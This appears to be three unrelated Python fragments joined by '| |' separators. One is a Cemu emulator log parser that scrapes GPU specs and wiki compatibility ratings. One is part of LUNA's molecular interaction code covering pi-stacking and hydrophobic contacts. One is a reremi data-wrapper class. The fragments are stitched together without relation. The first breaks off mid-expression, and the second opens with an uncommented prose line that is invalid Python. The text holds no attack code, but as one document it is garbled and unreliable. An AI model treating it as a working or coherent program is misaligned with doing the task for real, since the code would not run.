return "Enabled" if result else "Disabled"
@name("settings.console_region")
@default("Auto")
def console_region(self, file, info):
return regex_group(re.search(r"Console region: (.*?)$", file, re.M), 1)
@name("settings.thread_quantum")
@default("Default")
def thread_quantum(self, file, info):
return regex_group(re.search(r"Thread quantum set to (.*?)$", file, re.M), 1)
@name("settings.custom_timer_mode")
@default("Default")
def custom_timer_mode(self, file, info):
result = regex_group(re.search(r"Custom timer mode: (.*?)$", file, re.M), 1)
if result == "none":
result = "Default"
return result
def __init__(self):
self.embed = [
self.loaded_title, self.game_crashed,
self.overwolf_issue, self.piracy_check,
self.cemu_version, self.cemuhook_version,
self.title_id, self.title_version,
self.rpx_hash_updated, self.rpx_hash_base, self.shadercache_name,
self.cpu, self.ram, self.gpu, self.gpu_driver,
self.cpu_affinity, self.cpu_mode, self.cpu_extensions,
self.disabled_cpu_extensions, self.backend,
self.vulkan_async, self.gx2drawdone, self.console_region,
self.thread_quantum, self.custom_timer_mode
]
def parse(self, file):
info = {}
for func in self.embed:
result = func(file, info)
info[func.name] = result if (result != None) else func.default
return info
class ExtraParser(Parser):
"""
Same as Parser, with a few extra bits of info that must be fetched from
external sources (GPU support and game compatibility).
"""
@name("specs.gpu_specs.url")
@default("")
def gpu_specs_url(self, file, info):
query = info["specs.gpu"]
revised_query = re.sub(
r"(?:[0-9]GB|)/?(?:PCIe|)/?SSE2|\(TM\)|\(R\)| Graphics$|GB$| Series$|(?<=Mobile )Graphics$",
"", query
)
try:
req = requests.get(f"https://www.techpowerup.com/gpu-specs/?ajaxsrch={revised_query}")
except requests.exceptions.RequestException:
return None
req = req.text
if "Nothing found." in req:
return None
req = req.replace("\n","")
req = req.replace("\t","")
results = re.findall(r"<tr><td.+?><a href=\"(/gpu-specs/.*?)\">(.*?)</a>", req)
results = [list(reversed(x)) for x in results]
results = dict(results)
try:
matches = [
x for x in get_close_matches(query, results.keys())
if not (bool(re.search(r"mobile|max-q", query, re.I)) ^ bool(re.search(r"mobile|max-q", x, re.I)))
]
if results[matches[0]]:
return f"https://www.techpowerup.com{results[matches[0]]}"
return None
except (KeyError, IndexError):
return None
@name("specs.gpu_specs.html")
@default("")
def gpu_specs_html(self, file, info):
if info["specs.gpu_specs.url"]:
req = requests.get(info["specs.gpu_specs.url"])
if req.status_code == 200:
text = req.text
text = text.replace('\n','')
text = text.replace('\t','')
return text
return None
@name("specs.opengl")
@default("Unknown")
def opengl(self, file, info):
return regex_group(re.search(r"<dt>OpenGL</dt><dd>(.*?)</dd>", info["specs.gpu_specs.html"]), 1)
@name("specs.vulkan")
@default("Unknown")
def vulkan(self, file, info):
return regex_group(re.search(r"<dt>Vulkan</dt><dd>(.*?)</dd>", info["specs.gpu_specs.html"]), 1)
@name("game.wiki_page.url")
@default("")
def wiki_page_url(self, file, info):
try:
if self.title_ids[info["game.title_id"]]["wiki_has_game_id_redirect"]:
return f"http://wiki.cemu.info/wiki/{self.title_ids[info['game.title_id']]['game_id']}"
else:
# todo: use a cache of the cemu wiki instead of making a request on each parse
title = self.title_ids[info["game.title_id"]]["game_title"]
title = re.sub(r"[^\x00-\x7f]", r"", title)
title = title.replace(" ", "_")
return f"http://wiki.cemu.info/wiki/{title}"
except KeyError:
# this usually triggers when the title ID isn't in the database (mostly system titles)
return None
@name("game.wiki_page.html")
@default("")
def wiki_page_html(self, file, info):
if info["game.wiki_page.url"]:
req = requests.get(info["game.wiki_page.url"])
if req.status_code == 200:
return req.text
return None
@name("game.compat.rating")
@default("Unknown")
def compat_rating(self, file, info):
compat = regex_match(
re.findall(r"<tr style=\"vertical-align:middle;\">.*?</tr>", info["game.wiki_page.html"], re.M|re.S),
-1, ""
)
return regex_group(
re.search(r"<a href=\"/wiki/Category:.*?_\(Rating\)\" title=\"Category:.*? \(Rating\)\">(.*?)</a>", compat),
1
)
@name("game.compat.version")
@default("Unknown")
def compat_version(self, file, info):
compat = regex_match(
re.findall(r"<tr style=\"vertical-align:middle;\">.*?</tr>", info["game.wiki_page.html"], re.M|re.S),
-1, ""
)
return regex_group(
re.search(r"<a href=\"(?:/wiki/|/index\.php\?title=)Release.*? title=\".*?\">(.*?)</a>", compat),
1
)
def __init__(self, title_ids):
super().__init__()
self.title_ids = title_ids
self.embed += [
self.gpu_specs_url, self.gpu_specs_html, self.opengl, self.vulkan,
self.wiki_page_url, self.wiki_page_html,
self.compat_rating, self.compat_version
]
class RulesetParser:
"""
A class that takes log info parsed by {Parser} and a dictionary of rulesets,
and runs those rulesets on the data to determine potential problems.
To use this class, create an instance of it and run RulesetParser.parse().
"""
def __init__(self, rulesets):
self.rulesets = rulesets
# determines if ver1 <=> ver2
def version_check(self, ver1, ver2, operation):
ver1 = ver1.replace(" (Patreon release)", "")
ver2 = ver2.replace(" (Patreon release)", "")
ver1 = re.findall(r"(\d)\.(\d+)\.(\d+)([a-z]|$)", ver1, re.I)[0]
ver2 = re.findall(r"(\d)\.(\d+)\.(\d+)([a-z]|$)", ver2, re.I)[0]
ver1 = (int(ver1[0]), int(ver1[1]), int(ver1[2]), ver1[3])
ver2 = (int(ver2[0]), int(ver2[1]), int(ver2[2]), ver2[3])
# hotfixes should be ignored if ver2 doesn't specify a hotfix letter
if ver2[3] == '':
ver1 = ver1[:-1]
ver2 = ver2[:-1]
if operation == "lt":
for (n1, n2) in zip(ver1, ver2):
if n1 == n2:
continue
else:
return n1 < n2
elif operation == "eq":
return ver1 == ver2
elif operation == "ne":
return ver1 != ver2
elif operation == "gt":
for (n1, n2) in zip(ver1, ver2):
if n1 == n2:
continue
else:
return n1 > n2
else:
raise ValueError("Invalid operation; must be lt, eq, ne, or gt")
def parse(self, log_file: str, info: dict) -> list:
relevant_info = []
relevant_info.extend(self.parse_ruleset(log_file, info, self.rulesets["any"]))
try:
ruleset = self.rulesets[info["game.title_id"]]
# to avoid duplicate rulesets,
# one title ID (usually USA) holds the game's ruleset,
# and the other regions simply redirect to it
if type(ruleset) == str:
ruleset = self.rulesets[ruleset]
relevant_info.extend(self.parse_ruleset(log_file, info, ruleset))
except KeyError:
pass
return relevant_info
def parse_ruleset(self, log_file: str, info: dict, ruleset: list) -> list:
messages = []
for rule in ruleset:
match_type = rule["match"]
message = rule["message"]
test_result = None
for test in rule["rules"]:
test_result = True
if test["property"] == "log":
prop = log_file
else:
prop = info[test["property"]]
rule_type = test["type"]
value = test["value"]
test_result = (\
(rule_type == "str_eq" and prop == value) or \
(rule_type == "str_ne" and prop != value) or \
(rule_type == "str_contains" and value in prop) or \
(rule_type == "str_not_contains" and value not in prop) or \
| |
If a nucleophile has 2 atoms, it will select the partially negative atom based on the electronegativity.
if len(elect_grp.atoms) == 2:
elect_atm = elect_grp.atoms[0] if (elect_grp.atoms[0].electronegativity
> elect_grp.atoms[1].electronegativity) else elect_grp.atoms[1]
cation_grp = inter.get_partner(elect_grp)
amide_inconsistences[(elect_atm, cation_grp)].append(inter)
inconsistencies = set()
for (atm1, atm2), inters in hbond_inconsistences.items():
if len(inters) > 1 and any([i.type == "Hydrogen bond" for i in inters]):
inconsistencies.update([i for i in inters if i.type != "Hydrogen bond"])
for (amide_atm, arom_grp), inters in amide_inconsistences.items():
if len(inters) > 1:
inconsistencies.update([i for i in inters if i.type != "Amide-aromatic stacking"])
interactions -= inconsistencies
# Clear the references of each interaction from the AtomGroup objects.
for inter in inconsistencies:
inter.clear_refs()
def remove_h2o_pairs_with_no_target(self, interactions):
"""Remove interactions of water with atoms and atom groups that do not belong to the target
of LUNA's analysis, which are chains or molecules defined as an :class:`~luna.mol.entry.Entry` instance.
Parameters
----------
interactions : :class:`~luna.interaction.type.InteractionType`
"""
valid_h2o_set = set()
invalid_inters = defaultdict(set)
for inter in interactions:
if inter.src_grp.is_water() and not inter.trgt_grp.has_target() and inter.src_grp not in valid_h2o_set:
invalid_inters[inter.src_grp].add(inter)
elif inter.trgt_grp.is_water() and not inter.src_grp.has_target() and inter.trgt_grp not in valid_h2o_set:
invalid_inters[inter.trgt_grp].add(inter)
else:
if inter.src_grp.is_water() and inter.trgt_grp.has_target():
valid_h2o_set.add(inter.src_grp)
if inter.src_grp in invalid_inters:
del invalid_inters[inter.src_grp]
if inter.trgt_grp.is_water() and inter.src_grp.has_target():
valid_h2o_set.add(inter.trgt_grp)
if inter.trgt_grp in invalid_inters:
del invalid_inters[inter.trgt_grp]
inters_to_remove = set([i for k in invalid_inters for i in invalid_inters[k]])
interactions -= inters_to_remove
# Clear the references of each interaction from the AtomGroup objects.
for inter in inters_to_remove:
inter.clear_refs()
def _default_functions(self):
return {
# Hydrophobic interaction
("Hydrophobic", "Hydrophobic"): [self.calc_hydrop],
("Hydrophobe", "Hydrophobe"): [self.calc_hydrop],
# Hydrogen bond
("Donor", "Acceptor"): [self.calc_hbond],
# Weak hydrogen bond
("WeakDonor", "Acceptor"): [self.calc_weak_hbond],
("WeakDonor", "WeakAcceptor"): [self.calc_weak_hbond],
("Donor", "Aromatic"): [self.calc_hbond_pi],
("WeakDonor", "Aromatic"): [self.calc_hbond_pi],
# Halogen bond
("HalogenDonor", "Acceptor"): [self.calc_xbond],
("HalogenDonor", "Aromatic"): [self.calc_xbond_pi],
# Chalcogen bond
("ChalcogenDonor", "Acceptor"): [self.calc_chalc_bond],
("ChalcogenDonor", "WeakAcceptor"): [self.calc_chalc_bond],
("ChalcogenDonor", "Aromatic"): [self.calc_chalc_bond_pi],
# Stackings
("Aromatic", "Aromatic"): [self.calc_pi_pi],
("Amide", "Aromatic"): [self.calc_amide_pi],
("Positive", "Aromatic"): [self.calc_cation_pi],
("PosIonizable", "Aromatic"): [self.calc_cation_pi],
("PositivelyIonizable", "Aromatic"): [self.calc_cation_pi],
# Ionic interaction
("NegativelyIonizable", "PositivelyIonizable"): [self.calc_ionic],
("NegIonizable", "PosIonizable"): [self.calc_ionic],
("Negative", "Positive"): [self.calc_ionic],
# Repulsive interaction
("NegativelyIonizable", "NegativelyIonizable"): [self.calc_repulsive],
("PositivelyIonizable", "PositivelyIonizable"): [self.calc_repulsive],
("NegIonizable", "NegIonizable"): [self.calc_repulsive],
("PosIonizable", "PosIonizable"): [self.calc_repulsive],
("Negative", "Negative"): [self.calc_repulsive],
("Positive", "Positive"): [self.calc_repulsive],
# Favorable multipolar interactions.
("Nucleophile", "Electrophile"): [self.calc_multipolar],
# Unfavorable multipolar interactions.
("Nucleophile", "Nucleophile"): [self.calc_multipolar],
("Electrophile", "Electrophile"): [self.calc_multipolar],
# Favorable ion-dipole interactions
("Nucleophile", "PositivelyIonizable"): [self.calc_ion_multipole],
("Nucleophile", "PosIonizable"): [self.calc_ion_multipole],
("Nucleophile", "Positive"): [self.calc_ion_multipole],
("Electrophile", "NegativelyIonizable"): [self.calc_ion_multipole],
("Electrophile", "NegIonizable"): [self.calc_ion_multipole],
("Electrophile", "Negative"): [self.calc_ion_multipole],
# Unfavorable ion-dipole interactions
("Nucleophile", "NegativelyIonizable"): [self.calc_ion_multipole],
("Nucleophile", "NegIonizable"): [self.calc_ion_multipole],
("Nucleophile", "Negative"): [self.calc_ion_multipole],
("Electrophile", "PositivelyIonizable"): [self.calc_ion_multipole],
("Electrophile", "PosIonizable"): [self.calc_ion_multipole],
("Electrophile", "Positive"): [self.calc_ion_multipole],
# Proximal, covalent, vdw, clash
("Atom", "Atom"): [self.calc_atom_atom, self.calc_proximal]
}
# TODO: Incluir:
# Anion - pi system
# disulfide bond
# Weak donor - weak acceptor
# Agostic and Hydrogen-Bonding X–H· · · M
# agnostic, anagostic
# Metalic complex
# REF: https://onlinelibrary.wiley.com/doi/epdf/10.1002/anie.200390319
# aromatic between hbond arrays
@staticmethod
def calc_cation_pi(self, params):
"""Default method to calculate cation-pi interactions.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
cc_dist = im.euclidean_distance(group1.centroid, group2.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_dist_cation_pi_inter", le)):
params = {"dist_cation_pi_inter": cc_dist}
inter = InteractionType(group1, group2, "Cation-pi", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_pi_pi(self, params):
"""Default method to calculate aromatic stackings.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
ring1, ring2, feat1, feat2 = params
interactions = []
cc_dist = im.euclidean_distance(ring1.centroid, ring2.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_cc_dist_pi_pi_inter", le)):
dihedral_angle = im.to_quad1(im.angle(ring1.normal, ring2.normal))
min_disp_angle = float("Inf")
for r1, r2 in [(ring1, ring2), (ring2, ring1)]:
cc_vect = r2.centroid - r1.centroid
disp_angle = im.to_quad1(im.angle(r1.normal, cc_vect))
if disp_angle < min_disp_angle:
ring1, ring2 = r1, r2
min_disp_angle = disp_angle
criteria = ["min_dihed_ang_slope_pi_pi_inter", "max_dihed_ang_slope_pi_pi_inter", "min_disp_ang_offset_pi_pi_inter",
"max_disp_ang_offset_pi_pi_inter"]
# If the angle criterion were not defined, a specific Pi-stacking definition is not possible as it depends on
# angle criterion. Therefore, a more general classification is used instead, i.e., all interactions will be Pi-stacking.
if any([c not in self.inter_config for c in criteria]):
inter_type = "Pi-stacking"
elif self.is_within_boundary(min_disp_angle, "min_disp_ang_offset_pi_pi_inter", le):
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Face-to-face pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Face-to-edge pi-stacking"
else:
inter_type = "Face-to-slope pi-stacking"
elif self.is_within_boundary(min_disp_angle, "max_disp_ang_offset_pi_pi_inter", ge):
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Edge-to-edge pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Edge-to-face pi-stacking"
else:
inter_type = "Edge-to-slope pi-stacking"
else:
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Displaced face-to-face pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Displaced face-to-edge pi-stacking"
else:
inter_type = "Displaced face-to-slope pi-stacking"
params = {"cc_dist_pi_pi_inter": cc_dist,
"dihed_ang_pi_pi_inter": dihedral_angle,
"disp_ang_pi_pi_inter": min_disp_angle}
inter = InteractionType(ring1, ring2, inter_type, directional=True, params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_amide_pi(self, params):
"""Default method to calculate amide-pi stackings.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
if feat1.name == "Aromatic" and feat2.name == "Amide":
ring_grp = group1
amide_grp = group2
elif feat2.name == "Aromatic" and feat1.name == "Amide":
ring_grp = group2
amide_grp = group1
else:
logger.warning("Amide-aromatic interactions require an aromatic and an amide group. However, the informed "
"groups have the features %s and %s." % (group1.feature_names, group2.feature_names))
return []
# Distance between the amide and ring centroids.
cc_dist = im.euclidean_distance(ring_grp.centroid, amide_grp.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_cc_dist_amide_pi_inter", le)):
dihedral_angle = im.to_quad1(im.angle(ring_grp.normal, amide_grp.normal))
cc_vect = amide_grp.centroid - ring_grp.centroid
disp_angle = im.to_quad1(im.angle(ring_grp.normal, cc_vect))
if (self.is_within_boundary(dihedral_angle, "max_dihed_ang_amide_pi_inter", le)
and self.is_within_boundary(disp_angle, "max_disp_ang_pi_pi_inter", le)):
params = {"cc_dist_amide_pi_inter": cc_dist,
"dihed_ang_amide_pi_inter": dihedral_angle,
"disp_ang_amide_pi_inter": disp_angle}
inter = InteractionType(group1, group2, "Amide-aromatic stacking", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_hydrop(self, params):
"""Default method to calculate hydrophobic interactons.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
if ((feat1.name != "Hydrophobic" and feat1.name != "Hydrophobe")
or (feat2.name != "Hydrophobic" and feat2.name != "Hydrophobe")):
logger.warning("Hydrophobic interactions require hydrophobic atoms or hydrophobes (group of hydrophobic atoms). "
"However, the informed groups have the features %s and %s." % (group1.feature_names, group2.feature_names))
return []
# Check if the interaction involves the same compound. For these cases, we ignore hydrophobic interactions.
if self._is_intramol_inter(group1, group2):
return []
# Verify if the groups contain the required number of atoms to form a valid surface.
if (not self.is_within_boundary(len(group1.atoms), "min_surf_size", ge)
or not self.is_within_boundary(len(group2.atoms), "min_surf_size", ge)):
return []
interacting_atms_in_surf1 = set()
interacting_atms_in_surf2 = set()
min_cc_dist = float('Inf')
for atm1, atm2 in product(group1.atoms, group2.atoms):
cc_dist = atm1 - atm2
if self.is_within_boundary(cc_dist, "max_dist_hydrop_inter", le):
interacting_atms_in_surf1.add(atm1)
interacting_atms_in_surf2.add(atm2)
if cc_dist < min_cc_dist:
min_cc_dist = cc_dist
# Verify if the number of interacting atoms attends the required number of interating atoms per surface.
if (not self.is_within_boundary(len(interacting_atms_in_surf1), "min_inter_atom_in_surf", ge)
or not self.is_within_boundary(len(interacting_atms_in_surf2), "min_inter_atom_in_surf", ge)):
return []
if (self.is_within_boundary(min_cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(min_cc_dist, "max_dist_hydrop_inter", le)):
params = {"dist_hydrop_inter": min_cc_dist}
inter = InteractionType(group1, group2, "Hydrophobic", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_ion_multipole(self, params):
"""Default method to calculate favorable and unfavorable ion-dipole interactions.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, | |
<reponame>zliobaite/teeth-redescription
import os.path
import collections
import sys
import re
import pdb
from ..reremi.classRedescription import Redescription, printTexRedList, printRedList, parseRedList
from ..reremi.classData import Data, DataError
from ..reremi.classQuery import Query
from ..reremi.toolICList import ICList
from ..reremi.toolICDict import ICDict
from ..reremi.toolLog import Log
from ..reremi.classBatch import Batch
from ..reremi.classPreferencesManager import PreferencesManager, PreferencesReader
from ..reremi import toolRead
from ..reremi.classPackage import Package, writePreferences, writeRedescriptions
#from findFiles import findFile
def findFile(fname, path=[]):
"""Finds file from path (always including the current working directory) and returns
its path or 'None' if the file does not exist.
If path is not given or an empty list, only checks if the file is present locally.
On Windows, this also chagnges forward slashes to backward slashes in the path."""
if os.path.exists(fname):
return fname
for p in path:
testpath = os.path.join(os.path.normpath(p), fname)
if os.path.exists(testpath):
return testpath
return None
class DataWrapper(object):
"""Contains all the data
"""
def __init__(self, logger=None, package_filename = None, conf_defs=[]):
"""Inits the class. Either package_filename or the others should be given.
"""
#### [[idi, 1] for idi in range(len(self.data))]
if logger is None:
self.logger = Log()
else:
self.logger = logger
self.pm = PreferencesManager(conf_defs)
self.data = None
self.polys = None
self.pdp = None
self.resetRedescriptions()
self.preferences = ICDict(self.pm.getDefaultTriplets())
self.package = None
self._isChanged = False
self._isFromPackage = False
# (possible) function pointers to tell we've started and stopped reading
# If these are not None, they have to be triples (fnc, *args, **kwargs)
# See: self.registerStartReadingFileCallback and self.registerStopReadingFileCallback
self.startReadingFileCallback = None
self.stopReadingFileCallback = None
if package_filename is not None:
self.openPackage(package_filename)
def resetRedescriptions(self, reds=[]):
self.reds = Batch(reds)
self.rshowids = ICList(range(len(reds)), True)
def getColNames(self):
if self.data is not None:
return self.data.getNames()
return [[],[]]
def dataHasMissing(self):
if self.data is not None:
return self.data.hasMissing()
return False
def getNbRows(self):
if self.data is not None:
return self.data.nbRows()
return 0
def getDataCols(self, side):
if self.data is not None:
return self.data.cols[side]
return []
def getDataRows(self):
if self.data is not None:
return self.data.getRows()
return []
def getData(self):
return self.data
def isGeospatial(self):
if self.data is not None and self.data.isGeospatial():
return True
else:
return False
def getCoords(self):
if self.data is not None and self.data.isGeospatial():
return self.data.coords
def getCoordsExtrema(self):
if self.data is not None and self.data.isGeospatial():
return self.data.getCoordsExtrema()
return None
def getReds(self):
if self.reds is not None:
return self.reds
return []
def getNbReds(self):
if self.reds is not None:
return len(self.reds)
return 0
def getShowIds(self):
if self.rshowids is not None:
return self.rshowids
return []
def getPreferencesManager(self):
return self.pm
def getPreferences(self):
return self.preferences
def getPreference(self, param_id):
if self.preferences is not None and param_id in self.preferences:
return self.preferences[param_id]["data"]
else:
return False
def registerStartReadingFileCallback(self, fnc, *args, **kwargs):
"""Registers the function DataWrapper calls when it starts to read a file (to tell that it
starts reading the file). Parameters: fnc, [*args,] [**kwargs],
where fnc is a function with prototype
fnc(msg, [short_msg], [*args], [**kwargs])"""
self.startReadingFileCallback = (fnc, args, kwargs)
def registerStopReadingFileCallback(self, fnc, *args, **kwargs):
"""Registers the function DataWrapper calls when it stops reading a file.
Parameters: fnc, [*args,] [**kwargs],
where fnc is a function with prototype
fnc([msg], [*args], [**kwargs])"""
self.stopReadingFileCallback = (fnc, args, kwargs)
def __str__(self):
return "coords = " + str(self.getCoords()) + "; " \
+ "data = " + str(self.data) + "; " \
+ "#reds = " + str(len(self.reds)) + "; " \
+ "rshowids = " + str(self.rshowids) + "; " \
+ "preferences = " + str(self.preferences) + "; " \
+ "package_name = " + str(self.package_name) + "; " \
+ "isChanged = " + str(self.isChanged) + "; " \
+ "isFromPackage = " + str(self.isFromPackage)
## Setters
@property
def isChanged(self):
"""The property tracking if dw (incl. reds and rshowids) has changed"""
isChanged = self._isChanged
if self.reds is not None:
isChanged |= self.reds.isChanged
if self.rshowids is not None:
isChanged |= self.rshowids.isChanged
if self.preferences is not None:
isChanged |= self.preferences.isChanged
return isChanged
@isChanged.setter
def isChanged(self, value):
if isinstance(value, bool):
if value is False:
if self.reds is not None:
self.reds.isChanged = value
if self.rshowids is not None:
self.rshowids.isChanged = value
if self.preferences is not None:
self.preferences.isChanged = value
self._isChanged = value
else:
raise TypeError("The isChanged property accepts only Boolean attributes")
#isChanged = property(_get_isChanged, _set_isChanged)
@property
def isFromPackage(self):
"""The property tracking if dw was loaded from a package"""
return self._isFromPackage
@isFromPackage.setter
def isFromPackage(self, value):
if isinstance(value, bool):
self._isFromPackage = value
else:
raise TypeError("The isFromPackage property accepts only Boolean attributes")
def updatePreferencesDict(self, params):
#if type(params) == dict:
if isinstance(params, collections.MutableMapping):
self.preferences.update(params)
self.resetSSetts()
#self.isChanged = True
def setData(self, data):
self.data = data
self.resetSSetts()
def resetSSetts(self):
if self.getData() is not None:
if self.getData().hasMissing() is False:
parts_type = "grounded"
else:
parts_type = self.preferences.get("parts_type", {"data": None})["data"]
pval_meth = self.preferences.get("method_pval", {"data": None})["data"]
self.getData().getSSetts().reset(parts_type, pval_meth)
################################################################
def loadRedescriptionsFromFile(self, redescriptions_filename):
"""Loads new redescriptions from file"""
tmp_reds, tmp_rshowids = (None, None)
self._startMessage('importing', redescriptions_filename)
try:
tmp_reds, tmp_rshowids = self._readRedescriptionsFromFile(redescriptions_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing redescriptions from file %s!\n%s" % (redescriptions_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
finally:
self._stopMessage('importing')
return tmp_reds, tmp_rshowids
#################### IMPORTS
def importDataFromCSVFiles(self, data_filenames):
fnames = list(data_filenames[:2])
self._startMessage('importing', fnames)
try:
tmp_data = self._readDataFromCSVFiles(data_filenames)
except DataError as details:
self.logger.printL(1,"Problem reading files.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing data from CSV files!\n%s" % sys.exc_info()[1], "dw_error", "DW")
self._stopMessage()
raise
else:
self.setData(tmp_data)
self.resetRedescriptions()
self._isChanged = True
self._isFromPackage = False
finally:
self._stopMessage('importing')
def importRedescriptionsFromFile(self, redescriptions_filename):
"""Loads new redescriptions from file"""
self._startMessage('importing', redescriptions_filename)
try:
tmp_reds, tmp_rshowids = self._readRedescriptionsFromFile(redescriptions_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing redescriptions from file %s!\n%s" % (redescriptions_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
else:
self.reds = tmp_reds
self.rshowids = tmp_rshowids
finally:
self._stopMessage('importing')
def importPreferencesFromFile(self, preferences_filename):
"""Imports mining preferences from file"""
self._startMessage('importing', preferences_filename)
try:
tmp_preferences = self._readPreferencesFromFile(preferences_filename)
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing preferences from file %s!\n%s" % (preferences_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
else:
self.preferences = tmp_preferences
self.preferences.isChanged = True
finally:
self._stopMessage('importing')
def openPackage(self, package_filename):
"""Loads new data from a package"""
self._startMessage('loading', [package_filename])
try:
self._readPackageFromFile(package_filename)
except DataError as details:
self.logger.printL(1,"Problem reading files.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open: %s" % arg, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while importing package from file %s!\n%s" % (package_filename, sys.exc_info()[1]), "dw_error", "DW")
self._stopMessage()
raise
finally:
self._stopMessage('loading')
######################## READS
def _readDataFromCSVFiles(self, data_filenames):
try:
data = Data(data_filenames, "csv")
except Exception:
self._stopMessage()
raise
return data
def _readRedescriptionsFromFile(self, filename, data=None):
if data is None:
if self.data is None:
self._stopMessage()
raise Exception("Cannot load redescriptions if data is not loaded")
else:
data = self.data
reds = Batch([])
show_ids = None
filep = open(filename, mode='r')
parseRedList(filep, data, reds)
rshowids = ICList(range(len(reds)), True)
return reds, rshowids
def _readPreferencesFromFile(self, filename):
filep = open(filename, mode='r')
return ICDict(PreferencesReader(self.pm).getParameters(filep))
def _readPackageFromFile(self, filename):
package = Package(filename, self._stopMessage)
elements_read = package.read(self.pm)
self.package_name = package.getPackagename()
if elements_read.get("data") is not None:
self.setData(elements_read.get("data"))
else:
self.data = None
if elements_read.get("reds") is not None:
self.reds = Batch(elements_read.get("reds"))
self.rshowids = ICList(elements_read.get("rshowids"), False)
else:
self.reds = Batch([])
self.rshowids = ICList([], False)
if elements_read.get("preferences"):
self.preferences = ICDict(elements_read.get("preferences"))
else:
self.preferences = self.pm.getDefaultTriplets()
self.package = package
self._isChanged = False
self._isFromPackage = True
## print "Done Loading"
def prepareContentPackage(self):
contents = {}
if self.data is not None:
contents['data'] = self.data
if self.reds is not None and len(self.reds) > 0:
contents['redescriptions'] = self.reds
contents['rshowids'] = self.rshowids
if self.preferences is not None:
contents['preferences'] = self.preferences
contents['pm'] = self.pm
return contents
